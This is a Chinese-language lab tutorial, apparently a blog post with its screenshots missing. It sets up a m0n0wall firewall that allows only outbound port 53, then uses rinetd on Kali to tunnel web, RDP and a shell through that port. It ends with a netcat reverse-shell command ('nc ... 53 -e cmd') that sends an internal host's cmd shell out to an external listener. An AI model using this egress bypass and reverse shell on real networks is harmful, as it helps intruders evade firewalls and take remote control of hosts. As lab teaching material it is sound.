模拟内网只能访问外网一个端口的情况下,如何访问其他端口,传输自己的远程桌面以及shell。
实验环境配置
配置monowall 防火墙及XP
防火墙模拟的内网和外网的分界线,XP模拟的内网主机。
下载monowall:
https://archive.org/download/generic-pc-1.8.1
新建monawall 虚拟机,添加一块网卡,将网卡一配置为主机模式(模拟内网),网卡二桥接到物理网络(模拟外网)
首次启动按7 安装到硬盘
安装完后按1配置接口,提示是否配置VLAN,输入n;接着叫输入LAN 接口名称(模拟内网),输入第一块网卡对应名称,这里是le0;WAN接口即为le1;
接着会提示其他接口直接回车,y继续,等待重启。
重启后输入2设置内网IP地址,输入LAN的IP1.1.1.1;输入子网掩码24;按y设置DHCP;输入地址池起始地址1.1.1.10;结束地址1.1.1.100;
按3恢复Web管理默认密码:mono
(4是恢复出厂设置)
按5重启保证设置生效
将一台XP的虚拟机的网卡连接主机模式并开机。(模拟内网主机)
查看IP及网关:
发现已经自动获取到了1.1.1.10的起始IP,网关也指向了1.1.1.1.说明防火墙配置成功了。接着打开浏览器看看是否能上网:
正常访问网页。
访问monowall管理页面http://1.1.1.1,账号admin密码mono。
点击rules,LAN,可以看到现在局域网可以向外网任何端口访问。点击绿色的小箭头禁用掉,点击Apply changes。
现在已经不能上网了。
现在新建一条规则:
意思为之内从内网访问外网的53(DNS的TCP&UDP)端口。
点击Save。点击Apply changes。
配置 kali
kali模拟的外网的负责转发端口的主机。
网卡桥接到物理网络。
安装端口转发软件rinetd
apt install rinetd
修改配置:
vi /etc/rinet.config
依次填写本机(kali)IP、本机侦听地址、转发给的目标(2003)IP、目标端口。
启动,并确认。
rinetd
ps aux | grep rinetd
查看53端口是否在侦听:
netstat -pantu | grep 53
配置 Windows 2003
03模拟的外网一台Web 服务器。
网卡桥接到物理网路。
鼠标右键“我的电脑”-“属性”-“远程”,启用远程桌面:
添加IIS:
或
依次点击:添加/删除Windows组件-应用程序服务器-Internet 信息服务(IIS),进去勾选万维网和FTP,点击确定,点击下一步。(注意要插入光驱)
安装完后为了更清楚显示,修改一下Web首页显示页面。
到
C:\Inetpub\wwwroot
目录下,编辑iisstart.htm文件
我将“建设中”字样改为了“This is Windows 2003”。
用kali访问2003的80端口:
web服务启用成功。
实现端口转发
访问网页
配置好之后在XP电脑上是不能上网的,现在内网只能访问外网的53端口,现在在浏览器访问kali的53端口
http://192.168.2.106:53/
成功访问。说明kali成功将端口转发给了服务器。
远程桌面重定向
重新编辑kali转发的端口:
vi /etc/rinetd.conf
将53端口转发给2003的3389端口:
保存退出,重启rinetd。
pkill rinetd
rinetd
查是否在侦听:
netstat -pantu
打开XP的远程桌面连接工具:
输入kali的地址和53端口:
点击链接后出现登录界面:
输入账号密码后成功登陆2003系统:
使用NC重定向获取Shell
将kali 的Windows NC程序拷贝到XP和03,Windows NC在kali上的路径:
/usr/share/windows-binaries/nc.exe
03侦听333端口:
kali将端口转发到03的333端口:
vi /etc/rinetd.conf
保存退出,重启rinetd。
pkill rinetd
rinetd
XP将shell发送给kali:
nc 192.168.2.106 53 -e cmd
03成功获取到内网XP的shell: